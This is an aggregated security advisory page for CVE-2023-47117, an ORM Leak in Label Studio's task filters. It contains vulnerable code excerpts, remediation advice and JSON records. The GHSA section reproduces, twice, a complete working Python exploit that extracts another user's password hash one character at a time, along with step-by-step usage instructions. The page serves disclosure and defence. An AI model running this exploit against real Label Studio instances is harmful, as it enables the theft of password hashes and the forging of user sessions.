PYSEC-2023-275

Vulnerability from pysec - Published: 2023-11-13 21:15 - Updated: 2024-11-21 14:22

Details

Label Studio is an open source data labeling tool. In all current versions of Label Studio prior to 1.9.2post0, the application allows users to insecurely set filters for filtering tasks. An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character. In addition, Label Studio had a hard coded secret key that an attacker can use to forge a session token of any user by exploiting this ORM Leak vulnerability to leak account password hashes. This vulnerability has been addressed in commit f931d9d129 which is included in the 1.9.2post0 release. Users are advised to upgrade. There are no known workarounds for this vulnerability.

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Impacted products

Name	purl
label-studio	pkg:pypi/label-studio

Aliases

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "label-studio",
        "purl": "pkg:pypi/label-studio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "f931d9d129002f54a495995774ce7384174cef5c"
            }
          ],
          "repo": "https://github.com/HumanSignal/label-studio",
          "type": "GIT"
        },
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.9.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.4.1",
        "0.4.2",
        "0.4.3",
        "0.4.4",
        "0.4.4.post1",
        "0.4.4.post2",
        "0.4.5",
        "0.4.6",
        "0.4.6.post1",
        "0.4.6.post2",
        "0.4.7",
        "0.4.8",
        "0.5.0",
        "0.5.1",
        "0.6.0",
        "0.6.1",
        "0.7.0",
        "0.7.1",
        "0.7.2",
        "0.7.3",
        "0.7.4",
        "0.7.4.post0",
        "0.7.4.post1",
        "0.7.5.post1",
        "0.7.5.post2",
        "0.8.0",
        "0.8.0.post0",
        "0.8.1",
        "0.8.1.post0",
        "0.8.2",
        "0.8.2.post0",
        "0.9.0",
        "0.9.0.post2",
        "0.9.0.post3",
        "0.9.0.post4",
        "0.9.0.post5",
        "0.9.1",
        "0.9.1.post0",
        "0.9.1.post1",
        "0.9.1.post2",
        "1.0.0",
        "1.0.0.post0",
        "1.0.0.post1",
        "1.0.0.post2",
        "1.0.0.post3",
        "1.0.1",
        "1.0.2",
        "1.0.2.post0",
        "1.1.0",
        "1.1.0rc0",
        "1.1.1",
        "1.2",
        "1.3",
        "1.3.post0",
        "1.3.post1",
        "1.4",
        "1.4.1",
        "1.4.1.post0",
        "1.4.1.post1",
        "1.5.0",
        "1.5.0.post0",
        "1.6.0",
        "1.7.0",
        "1.7.1",
        "1.7.2",
        "1.7.3",
        "1.8.0",
        "1.8.1",
        "1.8.2",
        "1.8.2.post0",
        "1.8.2.post1",
        "1.9.0",
        "1.9.1",
        "1.9.1.post0"
      ]
    }
  ],
  "aliases": [
    "CVE-2023-47117",
    "GHSA-6hjj-gq77-j4qw"
  ],
  "details": "Label Studio is an open source data labeling tool. In all current versions of Label Studio prior to 1.9.2post0, the application allows users to insecurely set filters for filtering tasks. An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django\u0027s Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character. In addition, Label Studio had a hard coded secret key that an attacker can use to forge a session token of any user by exploiting this ORM Leak vulnerability to leak account password hashes. This vulnerability has been addressed in commit `f931d9d129` which is included in the 1.9.2post0 release. Users are advised to upgrade. There are no known workarounds for this vulnerability.",
  "id": "PYSEC-2023-275",
  "modified": "2024-11-21T14:22:53.350760+00:00",
  "published": "2023-11-13T21:15:00+00:00",
  "references": [
    {
      "type": "EVIDENCE",
      "url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-6hjj-gq77-j4qw"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-6hjj-gq77-j4qw"
    },
    {
      "type": "FIX",
      "url": "https://github.com/HumanSignal/label-studio/commit/f931d9d129002f54a495995774ce7384174cef5c"
    }
  ],
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-6HJJ-GQ77-J4QW

Vulnerability from github – Published: 2023-11-14 18:27 – Updated: 2024-11-22 17:58

Summary

Label Studio Object Relational Mapper Leak Vulnerability in Filtering Task

Details

Introduction

This write-up describes a vulnerability found in Label Studio, a popular open source data labeling tool. The vulnerability affects all versions of Label Studio prior to 1.9.2post0 and was tested on version 1.8.2.

Overview

In all current versions of Label Studio, the application allows users to insecurely set filters for filtering tasks. An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character. For an example, the following filter chain will task results by the password hash of an account on Label Studio.

filter:tasks:updated_by__active_organization__active_users__password

For consistency, this type of vulnerability will be termed as ORM Leak in the rest of this disclosure.

In addition, Label Studio had a hard coded secret key that an attacker can use to forge a session token of any user by exploiting this ORM Leak vulnerability to leak account password hashes.

Description

The following code snippet from the ViewSetSerializer in label_studio/data_manager/serializers.py insecurely creates Filter objects from a JSON POST request to the /api/dm/views/{viewId} API endpoint.

    @staticmethod
    def _create_filters(filter_group, filters_data):
        filter_index = 0
        for filter_data in filters_data:
            filter_data["index"] = filter_index
            filter_group.filters.add(Filter.objects.create(**filter_data))
            filter_index += 1

These Filter objects are then applied in the TaskQuerySet in label_studio/data_manager/managers.py.

class TaskQuerySet(models.QuerySet):
    def prepared(self, prepare_params=None):
        """ Apply filters, ordering and selected items to queryset

        :param prepare_params: prepare params with project, filters, orderings, etc
        :return: ordered and filtered queryset
        """
        from projects.models import Project

        queryset = self

        if prepare_params is None:
            return queryset

        project = Project.objects.get(pk=prepare_params.project)
        request = prepare_params.request
        queryset = apply_filters(queryset, prepare_params.filters, project, request) <1>
        queryset = apply_ordering(queryset, prepare_params.ordering, project, request, view_data=prepare_params.data)

        if not prepare_params.selectedItems:
            return queryset

        # included selected items
        if prepare_params.selectedItems.all is False and prepare_params.selectedItems.included:
            queryset = queryset.filter(id__in=prepare_params.selectedItems.included)

        # excluded selected items
        elif prepare_params.selectedItems.all is True and prepare_params.selectedItems.excluded:
            queryset = queryset.exclude(id__in=prepare_params.selectedItems.excluded)

        return queryset

User provided filters are insecurely applied here by calling the apply_filters that constructs the Django ORM filter.

The PreparedTaskManager in label_studio/data_manager/managers.py uses the vulnerable TaskQuerySet for building the Django queryset for querying Task objects, as shown in the following code snippet.

class PreparedTaskManager(models.Manager):
    #...

    def get_queryset(self, fields_for_evaluation=None, prepare_params=None, all_fields=False): <1>
        """
        :param fields_for_evaluation: list of annotated fields in task
        :param prepare_params: filters, ordering, selected items
        :param all_fields: evaluate all fields for task
        :param request: request for user extraction
        :return: task queryset with annotated fields
        """
        queryset = self.only_filtered(prepare_params=prepare_params)
        return self.annotate_queryset(
            queryset,
            fields_for_evaluation=fields_for_evaluation,
            all_fields=all_fields,
            request=prepare_params.request
        )

    def only_filtered(self, prepare_params=None):
        request = prepare_params.request
        queryset = TaskQuerySet(self.model).filter(project=prepare_params.project) <1>
        fields_for_filter_ordering = get_fields_for_filter_ordering(prepare_params)
        queryset = self.annotate_queryset(queryset, fields_for_evaluation=fields_for_filter_ordering, request=request)
        return queryset.prepared(prepare_params=prepare_params)

Special Django method for the models.Manager class that is used to retrieve the queryset for querying objects of a model.
Uses the vulnerable TaskQuerySet that was explained above.

The following code snippet of the Task model in label_studio/tasks/models.py shows that the vulnerable PreparedTaskManager is set as a class variable, along with the updated_by relational mapping to a Django user that will be exploited as the entrypoint of the filter chain.

# ...
class Task(TaskMixin, models.Model):
    """ Business tasks from project
    """
    id = models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID', db_index=True)

    # ...

    updated_by = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='updated_tasks',
        on_delete=models.SET_NULL, null=True, verbose_name=_('updated by'),
        help_text='Last annotator or reviewer who updated this task') <1>

    # ...

    objects = TaskManager()  # task manager by default
    prepared = PreparedTaskManager()  # task manager with filters, ordering, etc for data_manager app <2>

    # ...

The entry point of the filter chain to filter by the updated_by__active_organization__active_users__password.
The vulnerable PreparedTaskManager being set that will be exploited.

Finally, the TaskListAPI view set in label_studio/tasks/api.py with the /api/tasks API endpoint uses the vulnerable PreparedTaskManager to filter Task objects.

    def get_queryset(self):
        task_id = self.request.parser_context['kwargs'].get('pk')
        task = generics.get_object_or_404(Task, pk=task_id)
        review = bool_from_request(self.request.GET, 'review', False)
        selected = {"all": False, "included": [self.kwargs.get("pk")]}
        if review:
            kwargs = {
                'fields_for_evaluation': ['annotators', 'reviewed']
            }
        else:
            kwargs = {'all_fields': True}
        project = self.request.query_params.get('project') or self.request.data.get('project')
        if not project:
            project = task.project.id
        return self.prefetch(
            Task.prepared.get_queryset(
                prepare_params=PrepareParams(project=project, selectedItems=selected, request=self.request),
                **kwargs
            )) <1>

Uses the vulnerable PreparedTaskManager to filter objects.

Proof of Concept

Below are the steps to exploit about how to exploit this vulnerability to leak the password hash of an account on Label Studio.

Create two accounts on Label Studio and choose one account to be the victim and the other the hacker account that you will use.
Create a new project or use an existing project, then add a task to the project. Update the task with the hacker account to cause the entry point of the filter chain.
Navigate to the task view for the project and add any filter with the Network inspect tab open on the browser. Look for a PATCH request to /api/dm/views/{view_id}?interaction=filter&project={project_id} and save the view_id and project_id for the next step.
Download the attached proof of concept exploit script named labelstudio_ormleak.py. This script will leak the password hash of the victim account character by character. Run the following command to run the exploit script, replacing the {view_id}, {project_id}, {cookie_str} and {url} with the corresponding values. For further explanation run python3 labelstudio_ormleak.py --help.

python3 labelstudio_ormleak.py -v {view_id} -p {project_id} -c '{cookie_str}' -u '{url}'

The following example GIF demonstrates exploiting this ORM Leak vulnerability to retrieve the password hash pbkdf2_sha256$260000$KKeew1othBwMKk2QudmEgb$ALiopdBpWMwMDD628xeE1Ie7YSsKxdXdvWfo/PvVXvw=.

labelstudio_ormleak_poc

Impact

This vulnerability can be exploited to completely compromise the confidentiality of highly sensitive account information, such as account password hashes. For all versions <=1.8.1, this finding can also be chained with hard coded SECRET_KEY to forge session tokens of any user on Label Studio and could be abuse to deteriorate the integrity and availability.

Remediation Advice

Do not use unsanitised values for constructing a filter for querying objects using Django's ORM. Django's ORM allows querying by relation field and performs auto lookups, that enable filtering by sensitive fields.
Validate filter values to an allow list before performing any queries.

Discovered

August 2023, Alex Brown, elttam

`labelstudio_ormleak.py` proof of concept

import argparse
import re
import requests
import string
import sys

# Password hash characters
CHARS = string.ascii_letters + string.digits + '$/+=_!'
CHARS_LEN = len(CHARS)

PAYLOAD = {
    "data": {
        "columnsDisplayType": {},
        "columnsWidth": {},
        "filters": {
            "conjunction": "and",
            "items": [
                {
                    "filter": "filter:tasks:updated_by__active_organization__active_users__password", # ORM Leak filter chain
                    "operator": "regex", # Use regex operator to filter password hash value
                    "type": "String",
                    "value": "REPLACEME"
                }
            ]
        },
        "gridWidth": 4,
        "hiddenColumns":{"explore":["tasks:inner_id"],"labeling":["tasks:id","tasks:inner_id"]},
        "ordering": [],
        "search_text": None,
        "target": "tasks",
        "title": "Default",
        "type": "list"
    },
    "id": 1, # View ID
    "project": "1" # Project ID
}

def parse_args() -> argparse.Namespace:
    parser = argparse.ArgumentParser(
        description='Leak an accounts password hash by exploiting a ORM Leak vulnerability in Label Studio'
    )

    parser.add_argument(
        '-v', '--view-id',
        help='View id of the page',
        type=int,
        required=True
    )

    parser.add_argument(
        '-p', '--project-id',
        help='Project id to filter tasks for',
        type=int,
        required=True
    )

    parser.add_argument(
        '-c', '--cookie-str',
        help='Cookie string for authentication',
        required=True
    )

    parser.add_argument(
        '-u', '--url',
        help='Base URL to Label Studio instance',
        required=True
    )

    return parser.parse_args()

def setup() -> dict:
    args = parse_args()
    view_id = args.view_id
    project_id = args.project_id
    path_1 = "/api/dm/views/{view_id}?interaction=filter&project={project_id}".format(
        view_id=view_id,
        project_id=project_id
    )
    path_2 = "/api/tasks?page=1&page_size=1&view={view_id}&interaction=filter&project={project_id}".format(
        view_id=view_id,
        project_id=project_id
    )
    PAYLOAD["id"] = view_id
    PAYLOAD["project"] = str(project_id)

    config_dict = {
        'COOKIE_STR': args.cookie_str,
        'URL_PATH_1': args.url + path_1,
        'URL_PATH_2': args.url + path_2,
        'PAYLOAD': PAYLOAD
    }
    return config_dict

def test_payload(config_dict: dict, payload) -> bool:
    sys.stdout.flush()
    cookie_str = config_dict["COOKIE_STR"]
    r_set = requests.patch(
        config_dict["URL_PATH_1"],
        json=payload,
        headers={
            "Cookie": cookie_str
        }
    )

    r_listen = requests.get(
        config_dict['URL_PATH_2'],
        headers={
            "Cookie": cookie_str
        }
    )

    r_json = r_listen.json()
    return len(r_json["tasks"]) >= 1

def test_char(config_dict, known_hash, c):
    json_payload_suffix = PAYLOAD
    test_escaped = re.escape(known_hash + c)
    json_payload_suffix["data"]["filters"]["items"][0]["value"] =  f"^{test_escaped}"

    suffix_result = test_payload(config_dict, json_payload_suffix)
    if suffix_result:
        return (known_hash + c, c)

    return None

def main():
    config_dict = setup()
    # By default Label Studio password hashes start with these characters
    known_hash = "pbkdf2_sha256$260000$"
    print()
    print(f"dumped: {known_hash}", end="")
    sys.stdout.flush()

    while True:
        found = False

        for c in CHARS:
            r = test_char(config_dict, known_hash, c)
            if not r is None:
                new_hash, c = r
                known_hash = new_hash
                print(c, end="")
                sys.stdout.flush()
                found = True
                break

        if not found:
            break

    print()

if __name__ == "__main__":
    main()

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "label-studio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.9.2.post0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-47117"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-11-14T18:27:08Z",
    "nvd_published_at": "2023-11-13T21:15:08Z",
    "severity": "HIGH"
  },
  "details": "# Introduction\n\nThis write-up describes a vulnerability found in [Label Studio](https://github.com/HumanSignal/label-studio), a popular open source data labeling tool. The vulnerability affects all versions of Label Studio prior to `1.9.2post0` and was tested on version `1.8.2`.\n\n# Overview\n\nIn all current versions of [Label Studio](https://github.com/HumanSignal/label-studio), the application allows users to insecurely set filters for filtering tasks. An attacker can construct a *filter chain* to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django\u0027s Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character. For an example, the following filter chain will task results by the password hash of an account on Label Studio.\n\n```\nfilter:tasks:updated_by__active_organization__active_users__password\n```\n\nFor consistency, this type of vulnerability will be termed as **ORM Leak** in the rest of this disclosure. \n\nIn addition, Label Studio had a hard coded secret key that an attacker can use to forge a session token of any user by exploiting this ORM Leak vulnerability to leak account password hashes.\n\n# Description\n\nThe following code snippet from the `ViewSetSerializer` in [`label_studio/data_manager/serializers.py`](https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/data_manager/serializers.py#L115) insecurely creates `Filter` objects from a JSON `POST` request to the `/api/dm/views/{viewId}` API endpoint.\n\n```python\n    @staticmethod\n    def _create_filters(filter_group, filters_data):\n        filter_index = 0\n        for filter_data in filters_data:\n            filter_data[\"index\"] = filter_index\n            filter_group.filters.add(Filter.objects.create(**filter_data))\n            filter_index += 1\n```\n\nThese `Filter` objects are then applied in the `TaskQuerySet` in [`label_studio/data_manager/managers.py`](https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/data_manager/managers.py#L473).\n\n```python\nclass TaskQuerySet(models.QuerySet):\n    def prepared(self, prepare_params=None):\n        \"\"\" Apply filters, ordering and selected items to queryset\n\n        :param prepare_params: prepare params with project, filters, orderings, etc\n        :return: ordered and filtered queryset\n        \"\"\"\n        from projects.models import Project\n\n        queryset = self\n\n        if prepare_params is None:\n            return queryset\n\n        project = Project.objects.get(pk=prepare_params.project)\n        request = prepare_params.request\n        queryset = apply_filters(queryset, prepare_params.filters, project, request) \u003c1\u003e\n        queryset = apply_ordering(queryset, prepare_params.ordering, project, request, view_data=prepare_params.data)\n\n        if not prepare_params.selectedItems:\n            return queryset\n\n        # included selected items\n        if prepare_params.selectedItems.all is False and prepare_params.selectedItems.included:\n            queryset = queryset.filter(id__in=prepare_params.selectedItems.included)\n\n        # excluded selected items\n        elif prepare_params.selectedItems.all is True and prepare_params.selectedItems.excluded:\n            queryset = queryset.exclude(id__in=prepare_params.selectedItems.excluded)\n\n        return queryset\n```\n1. User provided filters are insecurely applied here by calling the `apply_filters` that constructs the Django ORM filter.\n\nThe `PreparedTaskManager` in [`label_studio/data_manager/managers.py`](https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/data_manager/managers.py#L655) uses the vulnerable `TaskQuerySet` for building the Django queryset for querying `Task` objects, as shown in the following code snippet.\n\n```python\nclass PreparedTaskManager(models.Manager):\n    #...\n\n    def get_queryset(self, fields_for_evaluation=None, prepare_params=None, all_fields=False): \u003c1\u003e\n        \"\"\"\n        :param fields_for_evaluation: list of annotated fields in task\n        :param prepare_params: filters, ordering, selected items\n        :param all_fields: evaluate all fields for task\n        :param request: request for user extraction\n        :return: task queryset with annotated fields\n        \"\"\"\n        queryset = self.only_filtered(prepare_params=prepare_params)\n        return self.annotate_queryset(\n            queryset,\n            fields_for_evaluation=fields_for_evaluation,\n            all_fields=all_fields,\n            request=prepare_params.request\n        )\n\n    def only_filtered(self, prepare_params=None):\n        request = prepare_params.request\n        queryset = TaskQuerySet(self.model).filter(project=prepare_params.project) \u003c1\u003e\n        fields_for_filter_ordering = get_fields_for_filter_ordering(prepare_params)\n        queryset = self.annotate_queryset(queryset, fields_for_evaluation=fields_for_filter_ordering, request=request)\n        return queryset.prepared(prepare_params=prepare_params)\n```\n1. Special Django method for the `models.Manager` class that is used to retrieve the queryset for querying objects of a model.\n2. Uses the vulnerable `TaskQuerySet` that was explained above.\n\nThe following code snippet of the `Task` model in [`label_studio/tasks/models.py`](https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/tasks/models.py#L49C1-L102C102) shows that the vulnerable `PreparedTaskManager` is set as a class variable, along with the `updated_by` relational mapping to a Django user that will be exploited as the entrypoint of the filter chain.\n\n```python\n# ...\nclass Task(TaskMixin, models.Model):\n    \"\"\" Business tasks from project\n    \"\"\"\n    id = models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name=\u0027ID\u0027, db_index=True)\n\n    # ...\n\n    updated_by = models.ForeignKey(settings.AUTH_USER_MODEL, related_name=\u0027updated_tasks\u0027,\n        on_delete=models.SET_NULL, null=True, verbose_name=_(\u0027updated by\u0027),\n        help_text=\u0027Last annotator or reviewer who updated this task\u0027) \u003c1\u003e\n\n    # ...\n\n    objects = TaskManager()  # task manager by default\n    prepared = PreparedTaskManager()  # task manager with filters, ordering, etc for data_manager app \u003c2\u003e\n\n    # ...\n```\n1. The entry point of the filter chain to filter by the `updated_by__active_organization__active_users__password`.\n2. The vulnerable `PreparedTaskManager` being set that will be exploited.\n\nFinally, the `TaskListAPI` view set in [`label_studio/tasks/api.py`](https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/tasks/api.py#L205) with the `/api/tasks` API endpoint uses the vulnerable `PreparedTaskManager` to filter `Task` objects.\n\n```python\n    def get_queryset(self):\n        task_id = self.request.parser_context[\u0027kwargs\u0027].get(\u0027pk\u0027)\n        task = generics.get_object_or_404(Task, pk=task_id)\n        review = bool_from_request(self.request.GET, \u0027review\u0027, False)\n        selected = {\"all\": False, \"included\": [self.kwargs.get(\"pk\")]}\n        if review:\n            kwargs = {\n                \u0027fields_for_evaluation\u0027: [\u0027annotators\u0027, \u0027reviewed\u0027]\n            }\n        else:\n            kwargs = {\u0027all_fields\u0027: True}\n        project = self.request.query_params.get(\u0027project\u0027) or self.request.data.get(\u0027project\u0027)\n        if not project:\n            project = task.project.id\n        return self.prefetch(\n            Task.prepared.get_queryset(\n                prepare_params=PrepareParams(project=project, selectedItems=selected, request=self.request),\n                **kwargs\n            )) \u003c1\u003e\n```\n1. Uses the vulnerable `PreparedTaskManager` to filter objects.\n\n# Proof of Concept\n\nBelow are the steps to exploit about how to exploit this vulnerability to leak the password hash of an account on Label Studio.\n\n1. Create two accounts on Label Studio and choose one account to be the victim and the other the hacker account that you will use.\n2. Create a new project or use an existing project, then add a task to the project. Update the task with the hacker account to cause the entry point of the filter chain.\n3. Navigate to the task view for the project and add any filter with the `Network` inspect tab open on the browser. Look for a `PATCH` request to `/api/dm/views/{view_id}?interaction=filter\u0026project={project_id}` and save the `view_id` and `project_id` for the next step.\n4. Download the attached proof of concept exploit script named `labelstudio_ormleak.py`. This script will leak the password hash of the victim account character by character. Run the following command to run the exploit script, replacing the `{view_id}`, `{project_id}`, `{cookie_str}` and `{url}` with the corresponding values. For further explanation run `python3 labelstudio_ormleak.py --help`.\n\n```bash\npython3 labelstudio_ormleak.py -v {view_id} -p {project_id} -c \u0027{cookie_str}\u0027 -u \u0027{url}\u0027\n```\n\nThe following example GIF demonstrates exploiting this ORM Leak vulnerability to retrieve the password hash `pbkdf2_sha256$260000$KKeew1othBwMKk2QudmEgb$ALiopdBpWMwMDD628xeE1Ie7YSsKxdXdvWfo/PvVXvw=`.\n\n![labelstudio_ormleak_poc](https://user-images.githubusercontent.com/139727151/266986646-a3d1367c-fb4d-4482-9b6a-18a5d7316385.gif)\n\n# Impact\n\nThis vulnerability can be exploited to completely compromise the confidentiality of highly sensitive account information, such as account password hashes. For all versions `\u003c=1.8.1`, this finding can also be chained with hard coded `SECRET_KEY` to forge session tokens of any user on Label Studio and could be abuse to deteriorate the integrity and availability.\n\n# Remediation Advice\n\n* Do not use unsanitised values for constructing a filter for querying objects using Django\u0027s ORM. Django\u0027s ORM allows querying by relation field and performs auto lookups, that enable filtering by sensitive fields.\n* Validate filter values to an allow list before performing any queries.\n\n# Discovered\n- August 2023, Alex Brown, elttam\n\n---\n# `labelstudio_ormleak.py` proof of concept\n\n```py\nimport argparse\nimport re\nimport requests\nimport string\nimport sys\n\n# Password hash characters\nCHARS = string.ascii_letters + string.digits + \u0027$/+=_!\u0027\nCHARS_LEN = len(CHARS)\n\nPAYLOAD = {\n    \"data\": {\n        \"columnsDisplayType\": {},\n        \"columnsWidth\": {},\n        \"filters\": {\n            \"conjunction\": \"and\",\n            \"items\": [\n                {\n                    \"filter\": \"filter:tasks:updated_by__active_organization__active_users__password\", # ORM Leak filter chain\n                    \"operator\": \"regex\", # Use regex operator to filter password hash value\n                    \"type\": \"String\",\n                    \"value\": \"REPLACEME\"\n                }\n            ]\n        },\n        \"gridWidth\": 4,\n        \"hiddenColumns\":{\"explore\":[\"tasks:inner_id\"],\"labeling\":[\"tasks:id\",\"tasks:inner_id\"]},\n        \"ordering\": [],\n        \"search_text\": None,\n        \"target\": \"tasks\",\n        \"title\": \"Default\",\n        \"type\": \"list\"\n    },\n    \"id\": 1, # View ID\n    \"project\": \"1\" # Project ID\n}\n\ndef parse_args() -\u003e argparse.Namespace:\n    parser = argparse.ArgumentParser(\n        description=\u0027Leak an accounts password hash by exploiting a ORM Leak vulnerability in Label Studio\u0027\n    )\n\n    parser.add_argument(\n        \u0027-v\u0027, \u0027--view-id\u0027,\n        help=\u0027View id of the page\u0027,\n        type=int,\n        required=True\n    )\n\n    parser.add_argument(\n        \u0027-p\u0027, \u0027--project-id\u0027,\n        help=\u0027Project id to filter tasks for\u0027,\n        type=int,\n        required=True\n    )\n\n    parser.add_argument(\n        \u0027-c\u0027, \u0027--cookie-str\u0027,\n        help=\u0027Cookie string for authentication\u0027,\n        required=True\n    )\n\n    parser.add_argument(\n        \u0027-u\u0027, \u0027--url\u0027,\n        help=\u0027Base URL to Label Studio instance\u0027,\n        required=True\n    )\n\n    return parser.parse_args()\n\ndef setup() -\u003e dict:\n    args = parse_args()\n    view_id = args.view_id\n    project_id = args.project_id\n    path_1 = \"/api/dm/views/{view_id}?interaction=filter\u0026project={project_id}\".format(\n        view_id=view_id,\n        project_id=project_id\n    )\n    path_2 = \"/api/tasks?page=1\u0026page_size=1\u0026view={view_id}\u0026interaction=filter\u0026project={project_id}\".format(\n        view_id=view_id,\n        project_id=project_id\n    )\n    PAYLOAD[\"id\"] = view_id\n    PAYLOAD[\"project\"] = str(project_id)\n    \n    config_dict = {\n        \u0027COOKIE_STR\u0027: args.cookie_str,\n        \u0027URL_PATH_1\u0027: args.url + path_1,\n        \u0027URL_PATH_2\u0027: args.url + path_2,\n        \u0027PAYLOAD\u0027: PAYLOAD\n    }\n    return config_dict\n\ndef test_payload(config_dict: dict, payload) -\u003e bool:\n    sys.stdout.flush()\n    cookie_str = config_dict[\"COOKIE_STR\"]\n    r_set = requests.patch(\n        config_dict[\"URL_PATH_1\"],\n        json=payload,\n        headers={\n            \"Cookie\": cookie_str\n        }\n    )\n\n    r_listen = requests.get(\n        config_dict[\u0027URL_PATH_2\u0027],\n        headers={\n            \"Cookie\": cookie_str\n        }\n    )\n\n    r_json = r_listen.json()\n    return len(r_json[\"tasks\"]) \u003e= 1\n\ndef test_char(config_dict, known_hash, c):\n    json_payload_suffix = PAYLOAD\n    test_escaped = re.escape(known_hash + c)\n    json_payload_suffix[\"data\"][\"filters\"][\"items\"][0][\"value\"] =  f\"^{test_escaped}\"\n\n    suffix_result = test_payload(config_dict, json_payload_suffix)\n    if suffix_result:\n        return (known_hash + c, c)\n    \n    return None\n\ndef main():\n    config_dict = setup()\n    # By default Label Studio password hashes start with these characters\n    known_hash = \"pbkdf2_sha256$260000$\"\n    print()\n    print(f\"dumped: {known_hash}\", end=\"\")\n    sys.stdout.flush()\n\n    while True:\n        found = False\n\n        for c in CHARS:\n            r = test_char(config_dict, known_hash, c)\n            if not r is None:\n                new_hash, c = r\n                known_hash = new_hash\n                print(c, end=\"\")\n                sys.stdout.flush()\n                found = True\n                break\n\n        if not found:\n            break\n\n    print()\n\nif __name__ == \"__main__\":\n    main()\n```",
  "id": "GHSA-6hjj-gq77-j4qw",
  "modified": "2024-11-22T17:58:56Z",
  "published": "2023-11-14T18:27:08Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-6hjj-gq77-j4qw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47117"
    },
    {
      "type": "WEB",
      "url": "https://github.com/HumanSignal/label-studio/commit/f931d9d129002f54a495995774ce7384174cef5c"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/HumanSignal/label-studio"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/label-studio/PYSEC-2023-275.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Label Studio Object Relational Mapper Leak Vulnerability in Filtering Task"
}

CVE-2023-47117 (GCVE-0-2023-47117)

Vulnerability from cvelistv5 – Published: 2023-11-13 20:13 – Updated: 2025-01-08 21:12

Title

Object Relational Mapper Leak Vulnerability in Filtering Task in Label Studio

Summary

Label Studio is an open source data labeling tool. In all current versions of Label Studio prior to 1.9.2post0, the application allows users to insecurely set filters for filtering tasks. An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character. In addition, Label Studio had a hard coded secret key that an attacker can use to forge a session token of any user by exploiting this ORM Leak vulnerability to leak account password hashes. This vulnerability has been addressed in commit `f931d9d129` which is included in the 1.9.2post0 release. Users are advised to upgrade. There are no known workarounds for this vulnerability.

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE

CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor

Assigner

GitHub_M

References

URL

	Vendor	Product	Version
	HumanSignal	label-studio	Affected: < 1.9.2post0

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

PYSEC-2023-275

GHSA-6HJJ-GQ77-J4QW

Introduction

Overview

Description

Proof of Concept

Impact

Remediation Advice

Discovered

labelstudio_ormleak.py proof of concept

CVE-2023-47117 (GCVE-0-2023-47117)

Tags

Sightings

Nomenclature

`labelstudio_ormleak.py` proof of concept